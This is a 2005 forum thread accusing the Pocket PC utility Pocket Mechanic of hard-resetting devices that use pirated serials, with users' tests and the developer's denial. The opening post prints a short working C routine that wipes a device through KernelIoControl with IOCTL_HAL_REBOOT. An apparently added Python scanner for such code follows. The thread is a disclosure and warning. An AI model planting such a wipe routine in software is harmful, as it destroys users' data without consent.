Pocket Mechanic contains malicious code!
After reading this thread (http://www.aximsite.com/boards/showthread.php?t=67787) at Aximsite where users complain about hard resets invoked by Pocket Mechanic I thought to shed some light on Anton Tomov's (http://www.antontomov.com/) crude ways of dealing with software pirates.
I understand that Tomov is upset about people using illegal codes for his software. But does this give him the right to forcefully wipe-out someone's PDA? Isn't that highly illegal as well?
That's right. Use a pirated or blacklisted serial with Pocket Mechanic, Pocket Mechanic will detect it, and send your PDA with all its lovely content to Nirvana land. I don't know what Tomov is thinking, but I can only recommend everyone do not buy any of his products. What if a bug sneaks into his code enabling his hardreset routine even if you are a legal buyer? Who is going to pay for your damages? Mr. Tomov, would that be you?
Technicals:
The hardreset routine Tomov uses looks like the following:
    #include <windows.h>
    #include <winioctl.h>

    /* HAL ioctl that asks the kernel to reboot the device */
    #define IOCTL_HAL_REBOOT CTL_CODE(FILE_DEVICE_HAL, 15, METHOD_BUFFERED, FILE_ANY_ACCESS)

    extern "C" __declspec(dllimport) void SetCleanRebootFlag(void);
    extern "C" __declspec(dllimport) BOOL KernelIoControl(
        DWORD dwIoControlCode,
        LPVOID lpInBuf,
        DWORD nInBufSize,
        LPVOID lpOutBuf,
        DWORD nOutBufSize,
        LPDWORD lpBytesReturned);

    int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
                       LPTSTR lpCmdLine, int nCmdShow)
    {
        /* "clean" reboot = object store (RAM) is wiped, i.e. a hard reset */
        SetCleanRebootFlag();
        KernelIoControl(IOCTL_HAL_REBOOT, NULL, 0, NULL, 0, NULL);
        return 0;
    }
Perhaps someone should write a small utility that traps calls to KernelIoControl when the IOCTL_HAL_REBOOT flag is set. I cannot understand why Microsoft makes it so easy for virus programmers and people like Tomov to hard reset someone's PDA.
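A static triage check of the kind a cautious user could run over a Pocket PC binary to see whether it carries the ingredients of the snippet above, as an added example that is not from the original post or from any of the products discussed. It assumes the compiled binary stores the ioctl constant as a 32-bit little-endian literal and imports the two functions by name; the sample bytes are constructed, not taken from Pocket Mechanic or any other real program.

```python
import struct

# Values from winioctl.h, as used by the thread's snippet:
# CTL_CODE(FILE_DEVICE_HAL, 15, METHOD_BUFFERED, FILE_ANY_ACCESS)
FILE_DEVICE_HAL = 0x101
METHOD_BUFFERED = 0
FILE_ANY_ACCESS = 0


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Same bit layout as the CTL_CODE macro."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


IOCTL_HAL_REBOOT = ctl_code(FILE_DEVICE_HAL, 15, METHOD_BUFFERED, FILE_ANY_ACCESS)

# Import names the snippet relies on; they appear as ASCII in a PE import table.
REBOOT_IMPORTS = (b"SetCleanRebootFlag", b"KernelIoControl")


def scan_hard_reset_indicators(blob: bytes) -> dict:
    """Report whether the reboot imports and the reboot ioctl literal are present.

    Assumption (not from the page): the compiler emitted the ioctl as a 32-bit
    little-endian literal. A program that computes the value at runtime, or
    resolves the import dynamically, would evade this check.
    """
    found_imports = [name.decode() for name in REBOOT_IMPORTS if name in blob]
    ioctl_le = struct.pack("<I", IOCTL_HAL_REBOOT)
    offsets, start = [], 0
    while (idx := blob.find(ioctl_le, start)) >= 0:
        offsets.append(idx)
        start = idx + 1
    # KernelIoControl alone is common in legitimate software; only the
    # combination with the reboot ioctl literal is worth flagging.
    capable = "KernelIoControl" in found_imports and bool(offsets)
    return {"imports": found_imports, "ioctl_offsets": offsets, "capable": capable}


def build_sample(with_reboot: bool) -> bytes:
    """Constructed stand-in for an import-name table plus a literal pool.

    Not a real PE file; just the byte patterns the scanner looks for.
    """
    names = [b"GetProcAddress\0", b"RegQueryValueExW\0"]
    pool = [struct.pack("<I", 0xDEADBEEF)]  # constructed filler literal
    if with_reboot:
        names += [n + b"\0" for n in REBOOT_IMPORTS]
        pool.append(struct.pack("<I", IOCTL_HAL_REBOOT))
    return b"".join(names) + b"\0" * 16 + b"".join(pool)


if __name__ == "__main__":
    for flag in (False, True):
        print(f"with_reboot={flag}: {scan_hard_reset_indicators(build_sample(flag))}")
```

The check is an indicator, not proof: the constant can occur by coincidence and the imports are shared with harmless code, so a hit should prompt closer inspection (or a full backup before running the program), not an accusation.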
Alexander Turcic 01-29-2005, 07:29 PM Are you serious about that, Tad? That *really* stinks!
Edit: Looks like this is exactly what happened to some poor people over at Aximsite. I'll put this thread on the frontpage.
spinosum 01-30-2005, 04:22 AM Thanks for warning!!! I was actually shopping for some Tomov's products this morning. So now i better just forget about buying his products. And also to warn a few of my friends too!! :angry:
cheshire 01-30-2005, 05:50 AM Thanks for the warning TadW, I won't be looking at Tomov's products from now, and will warn my friends about this also.
While registered users have nothing to fear, putting users' data at risk of programming bugs is in my opinion akin to hijacking their PDAs.
Laurens 01-30-2005, 07:34 AM These kinds of measures only scare away prospective customers. Hopefully, the author will come to realize this.
A better way of dealing with piracy is to let the app display a bogus error message every now and then. This way you can separate the pirates from the customers when a user asks for support.
Skibum 01-30-2005, 08:59 AM Thanks for the tip Tad!
Chaos 01-30-2005, 03:44 PM That sort of behaviour kinda makes me sick... It's unethical and unnecessary.
Enter one character wrong as a serial number, and you may end up resetting your PPC... And another scary thought is, look at that small amount of code! Around 20 lines of code, and boom... Hard reset. Shouldn't Microsoft make it a LITTLE harder for a program to hard-reset a device?! (But then again, this comes from the same company who made ActiveX, which, in theory, can wipe a hard drive...)
Alexander Turcic 01-30-2005, 05:18 PM And another scary thought is, look at that small amount of code! Around 20 lines of code, and boom... Hard reset. Shouldn't Microsoft make it a LITTLE harder for a program to hard-reset a device?!
ABSOLUTELY! And Tad already spoke about it in the last paragraph... I also have some Win32 programming knowledge, and I know it would be trivial on desktop Windows to hook one of the two relevant API functions via GetProcAddress and then to put your own lines of code to it (e.g. sanity checks to prevent hard-resets). Not sure if that is possible in WinCE though. Suggestions?
Colin Dunstan 01-31-2005, 09:52 AM Tough crap. I wonder if the developer is coming to his senses and removing this code asap.
jkendrick 02-01-2005, 07:42 PM Has anyone verified that this s/w indeed has this code in it?
ortaliz 02-02-2005, 04:54 AM Maybe we can get the point of view of the developer so that he can state his case.
Alexander Turcic 02-02-2005, 01:10 PM I contacted Mr Tomov and am awaiting his answer.
Alexander Turcic 02-03-2005, 06:06 AM I removed Tad's technical analysis (post #11) from this thread. If you want to hear my opinion, follow this thread (http://www.mobileread.com/forums/showthread.php?t=3273).
I removed Tad's technical analysis (post #11) from this thread. If you want to hear my opinion, follow this thread (http://www.mobileread.com/forums/showthread.php?t=3273).
Sounds good! Note that the hard-reset snippet I posted is a known security risk which can be used by any software, worm, virus, etc. to hard-reset a PPC. I would not have posted it if it hadn't been made public already, here (http://www.airscanner.com/pubs/Defcon12.pdf) and here (http://www.pocketpcdn.com/articles/hardreset.html).
JStein 02-04-2005, 04:34 AM For what it's worth, I googled for a serial number, found one on a nasty site for 1.49. I then
- tried 1.49 with this serial. It didn't bomb.
- installed 1.50 which was mentioned in this thread and installed it over 1.49.
- when I clicked on the icon to start PM, my device did a reset and all data in RAM was lost.
Of course, since this was just an experiment, I did a full backup first, so I wasn't hurt. Notice that Tomov silently released 1.51 in the meantime (no mention in the changelog), and I haven't tried whether the bomb is still in this updated version.
JStein 02-04-2005, 09:59 AM Notice that Anton denies (http://www.antontomov.com/cgi-bin/ikonboard.cgi?act=ST;f=22;t=668) the allegations. He chose his wording very carefully and didn't directly deny that PM would hard-reset your device. Though he says
2. An entry of an invalid serial number won't cause the device to hard-reset. Everybody can check this pretty easily.
he does not say that it would not be possible, under circumstances, that PM hard-resets your device.
Read my previous post. When you enter an illegal serial in PM 1.49 or 1.50, it won't hard-reset your device, as stated by Anton. However, if you are using the particular illegal serial in PM 1.49 which has been then blacklisted in 1.50, running 1.50 with the old serial already installed and still in place in your registry will definitely hard-reset your PDA! Anton, why don't you admit this?
spinosum 02-04-2005, 10:35 AM Wow... getting heated up here! Reading the thread over at Anton's website, the guy (or gal?) "ddoodle22" has a point : "people who can heal, can kill!!"
My friends have all removed PM from their PDAs already!
Alexander Turcic 02-05-2005, 08:01 AM I personally went to Anton's forum and asked two very specific questions (http://www.antontomov.com/cgi-bin/ikonboard.cgi?act=ST;f=22;t=668), which he has been avoiding answering throughout several pages.
Anton, just to clarify this and to avoid any misunderstanding: can you guarantee that there is not - and has never been - any malicious code in Pocket Mechanic that would under any circumstances hard-reset my device without a warning?
and
Thank you I am going to write about this positive development on our frontpage. Does this also apply to version 1.50, which was the version under discussion?
Although still "just" soft proof (I decided to remove Tad's disassembly in this thread which some people might even consider hard proof), I am pretty much convinced that what has been said about Pocket Mechanic 1.50 was true. It contains code that could hard reset your device if you were using a pirated serial. Although I am absolutely not supporting software piracy, I don't think wiping out someone's PDA is any better.
Alexander Turcic 02-05-2005, 08:10 AM I found these interesting links in Spanish:
http://translate.google.com/translate?u=http%3A%2F%2Fmipcdebolsillo.com%2F&langpair=es%7Cen&hl=en&c2coff=1&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools
http://216.239.39.104/translate_c?hl=en&ie=UTF-8&oe=UTF-8&langpair=es%7Cen&u=http://www.mipcdebolsillo.com/node/19564%23comment-98097&prev=/language_tools
http://216.239.39.104/translate_c?hl=en&ie=UTF-8&oe=UTF-8&langpair=es%7Cen&u=http://barrapunto.com/miradero/04/11/13/1122216.shtml&prev=/language_tools
Looks like Tomov was not alone with his idea of hard-resetting PDAs... "Frank Garci'a (Ctitanic) , the author of the well-known Tweaks2k2 openly comments those that he and a supposed group of developer friends has considered for their creations, recognizing the creation of versions with malicious code to distribute it later conscientiously by the habitual sites "warez" like measurement to concienciar of the necessity to use legally registered versions."
Alexander Turcic 02-05-2005, 08:15 AM Since I was convinced that Tad's disassembly snippet did not contain any proprietary code nor code relevant to the key engine of Pocket Mechanic, I decided to undelete his post (http://www.mobileread.com/forums/showpost.php?p=14391&postcount=11).
Update: Mr Tomov contacted me and "kindly reminded" me to remove the disassembly code again. Although I don't see how this code violates any copyright laws, since it is essentially equivalent to the public domain C snippet from the first post in this thread, I honor his request and remove it. I have neither the time nor the will to fight legal wars with any software developer.
Update 2: While the code itself might not cause a problem per se, it could help a potential cracker to locate the license checking feature of Pocket Mechanic. This is why Anton asked me to remove it, and I appreciate his taking the time to explain it to me.
Bob Russell 02-05-2005, 01:50 PM This whole thing is a shame. Yes, pirating is bad, but I think targeting registration codes for hard resets is a terrible response. I hope it turns out that this is not what is being done.
If there are specific registrations that are being targeted, there are other alternatives.... like making them invalid and using false error messages after they are used (as suggested by someone before.)
Wasn't there some kind of similar uproar when the recording industry was trying to fight downloaders by putting malicious code on their PCs? I'm pretty sure the overwhelming result was a clear decision and legal consensus that this was not an activity protected by law, and it was not pursued further. Sounds kind of like this case, except the author seems to be digging his heels in rather than backing off. Maybe he's trying to wait it out, believing that the complaints will never turn into a legal battle and people will just "learn to live with it". But the short snippets we've heard from him make it seem pretty clear that his software should be avoided and he is taking a hard line on the topic.
.... I hope I'm wrong.
Colin Dunstan 02-07-2005, 03:04 PM I think this is sooooo sad. Are developers already that desperate that they have to take these kinds of extreme measures? I know Think2k2 once had a similar destroying code (or was it a fake keygen released by the developer?, don't remember).
I know Tomov has the reputation of a great PPC software developer. I am not sure what he was thinking when he was implementing this code, but I am sure he has now learned his lesson. As far as I know, Pocket Mechanic 1.51 doesn't hard-reset any devices anymore.
Better stay clean and safe! :daisy:
I am somewhat surprised what a wave of frustration I called with my initial post throughout the entire PPC community on the Web; and yet, I am glad that most people think the way I do: although piracy IS bad, it can never be as bad that it would justify Tomov's actions.
Morpheus is right, Anton learned his lesson, and as far as I can tell, Pocket Mechanic 1.51 doesn't kill your PDA anymore (don't take my word for it though!!).
Alexander Turcic 02-08-2005, 06:39 AM Perhaps in an effort to gain the trust of Pocket PC users again, Mr Tomov has issued a 30% discount on all of his products via PalmGear and Handango for a limited time:
PocketGear: pg5679432
Handango: 1AE7D2F
Btw, Pocket Mechanic 1.52 is out with various improvements, according to the programmer.
doctorow 02-09-2005, 04:01 AM 30% won't help to return my confidence.
lesliefranke 02-17-2005, 11:40 AM Perhaps in an effort to gain the trust of Pocket PC users again, Mr Tomov has issued a 30% discount on all of his products via PalmGear and Handango for a limited time:
PocketGear: pg5679432
Handango: 1AE7D2F
Btw, Pocket Mechanic 1.52 is out with various improvements, according to the programmer.
Is it safe to say that Pocket Mechanic 1.52 doesn't hard-reset the device?
Alexander Turcic 02-18-2005, 02:57 PM I am not sure if it is 100% safe, but it was confirmed by several people that since 1.51 PM would not hard reset your device anymore with known blacklisted serial numbers. And I think Anton is wise enough not to repeat his mistake.
spinosum 05-06-2005, 11:10 AM Lately my friend who downloaded the latest keygen/crack for the Resco Pic Viewer v5.30 had his PPC hard reset after he executed and exited the program!!! So please be informed that Anton Tomov has actually given a brilliant but cruel idea to the Resco developers to follow in his footsteps!
Lately my friend who downloaded the latest keygen/crack for the Resco Pic Viewer v5.30 had his PPC hard reset after he executed and exited the program!!! So please be informed that Anton Tomov has actually given a brilliant but cruel idea to the Resco developers to follow in his footsteps!
Cannot confirm that. After your post I analyzed the binaries but couldn't find anything that would trigger a similar code as the one that was used by Tomov. Perhaps something else was in the memory of your friend's PPC that caused the reset?
drtesdell@earth 05-06-2005, 11:20 PM Hi Folks,
Well, as a new iPAC owner, with about $1400. now invested in my PCC and software and smart card and extended battery, I am now not feeling real great about having this "Pocket Mechanic" utility! :huh: I have another program that does some of the same things...called MemMaid and MemMaidClener. But wonder if since I have this registered now if I am safe or still at risk? :blink:
OK, my MAIN question is around uninstalls. We all know how uninstalling from a regular PC using Windows XP or something similar can be incomplete and leave "straggler" files in the registry and all, sometimes not causing any problems, and sometimes making for a real mess right away or down the road.
Anyone have any utility they like that seeks out empty files, unlinked files, and other things, that is safe and user-friendly, but useful to make sure to not only keep a clean PCC and keep up the speed and programs working well, but also keep as much free space as possible? They have many of these for regular PCs. Norton makes some and several other companies, so I would be surprised if there were not ones for PCCs as well. I have had 4-5 uninstalls recently where it said "Uninstall unsuccessful" -- it couldn't delete all the files, even though I made sure they were closed and not running when I started the uninstall process. :angry:
Thanks for any suggestions or help on this. I just got my iPAC for DUMMIES book today, and actually it's not bad... a lot of hints and tricks and stuff my manual doesn't explain, not to mention many other things the manual leaves out as most manuals do. In case you need to know for your recommendation of an uninstall or clean up utility, I have an iPAC hx2755.
Thanks very much, and hope you all have a great weekend! :sunny:
circawdm
Colin Dunstan 05-06-2005, 11:57 PM Try SKTools (http://www.pocketgear.com/software_detail.asp?id=14288). It does everything you are looking for, like find orphaned files, uninstall programs etc. It's not free but definitely worth every cent! And no, I am in no way affiliated with that tool ;)
spinosum 05-07-2005, 02:44 AM Cannot confirm that. After your post I analyzed the binaries but couldn't find anything that would trigger a similar code as the one that was used by Tomov. Perhaps something else was in the memory of your friend's PPC that caused the reset?
My friend is a careful ppc geek, acc to him, there is no problem with upgrading the Resco Explorer using the cr@ck. He removed the Resco Pic Viewer v5.20 (incl. cleaning up the registry) before installing v5.30 and then used the keygen to generate the code. After keying in the code, there was a "Thank You For Purchasing..." pop-up, and then the pic viewer was able to run like normal. However, when he closed and exited the program, the whole ppc suddenly just went blank and needed a hard reset. He repeated the installation after the hard reset and it yielded the same end result! He asked me to try it out, but so far, since I have no backup for my ppc, I dare not take up this challenge! ;)
Brian 05-07-2005, 09:50 AM My friend is a careful ppc geek, acc to him, there is no problem with upgrading the Resco Explorer using the cr@ck.
Your "friend" *cough* may (or may not) be careful, but I for one see a major problem...
After keying in the code, there was a "Thank You For Purchasing..." pop-up, and then the pic viewer was able to run like normal. However when he closed and exit the program, the whole ppc suddenly just went blank and needing a hard reset. He repeated the installation after the hard reset and yield the same end-result!
Hardly proof that Resco Explorer contains malicious code, especially if an examination of the binaries didn't reveal anything suspicious. I wouldn't go making accusations that infer that Resco is utilizing malicious code to thwart piracy, thereby questioning their reputation, especially seeing that it's with anecdotal evidence from someone who by their own admission is not a legitimate licensee.
I on the other hand am a legitimate Resco Explorer and Viewer (for Palm OS) user, and in my experience they make quality products and have excellent customer support.
I'm disappointed to see someone (with only 4 posts I might add) openly discussing on these boards the use of pirated/cracked software (by a "friend") and spreading unsubstantiated (and with flimsy "evidence" at best) allegations that could possibly harm a very well respected software developer.
Is it possible to "subtract" Karma?
Brian
drtesdell@earth 05-07-2005, 01:04 PM Hey All,
Well, I upgraded to version 1.52 last night, and aside from a few added features, no problems at all. I am fully backed up on my PC and SD card of course.
I am not so sure if this guy is as nefarious as we are making him seem. Just to consider:
1. He gives his support email address
2. He stands to lose a lot of income if his s/w gets trashed or discontinued etc. or he gets sued (a possibility, esp. a class action suit by 100-500 or more people) and that would also drag in PocketGear and Handango, who I am sure have their own techies, who especially when alerted test out any questionable (or things people have complained about) s/w to see if they want to continue selling it. After all, their reputation is on the line also big time.
3. He keeps updating it, instead of disappearing into the dark with his money and coming out with something else to make money on and selling it through some other venue, perhaps even another name or company name.
I am for waiting and seeing what Alexander hears back before I judge this guy or mutter, as they say on TV, "Get a rope." :hanged: :)
DRT
Alexander Turcic 05-07-2005, 04:36 PM I think we are talking about several programs here at once. So let me summarize:
For as much as I know, Pocket Mechanic did have a hard-reset routine for stolen serials for versions before 1.51. Ever since, Anton has removed the code.
Regarding Resco Viewer 5.30, I cannot comment. Resco makes some of the finest apps for Pocket PCs, and I haven't read anything bad about them. Since it was Tad who revealed the malicious code in PM, I rely on his observations when he says that there is no harmful code present in Resco Viewer. Btw, V5.31 has been released; so in case your friend's device was really hard-reset due to some - perhaps faulty - code in 5.30, ask him to check 5.31.
I guess the moral of this discussion is that it pays to stay legit!
drtesdell@earth 05-08-2005, 05:10 PM Thanks Morpheus, :)
I'll go check it out. I don't mind paying for good software, and if there is a TRIAL version, I learned to try it first! Part of the whole deal with Anton and PM, which I bought and registered and is now version 5.1, is that people didn't pay I guess, and used other folks' serial numbers on their devices.
While I do not condone the rather harsh hard reset consequence Anton apparently put in his earlier versions for those who didn't buy it and use their own code, I can see if I were an inventor trying to sell something, I would try my best to make sure for every 100 copies I sold, 500 did not get given out for free essentially. It's not much different than all the safeguards Microsoft and other big PC manufacturers try to take to protect their investments, as well as the music and DVD-video industry (huge cases in point). And obviously the government and courts see it as a serious enough problem that the federal fines for big time piracy are very stiff I guess. :beadyeyes
I'm not trying to come off as a "goodie two shoes" (or three shoes), but I guess I feel like if my "product" I spent a lot of time and money on making, testing, advertising and then promoting etc. was being ripped off, and I was losing a lot of money, I am sure I would feel p***ed off as well. I wouldn't go burn crosses in people's yards or give their computers a virus, but I would somehow try to stop it any way I could. Anton just picked a very nasty and severe punishment it seems for his earlier versions. Who knows? Maybe this is his whole life income and he has a wife and 6 kids to feed, etc? If it were me, I'd protect my income also. But I would do it in less "destructive" ways.
Anyhow, off to find SKTools!
DRT (and happy Mother's Day to any who consider themselves mothers) ;)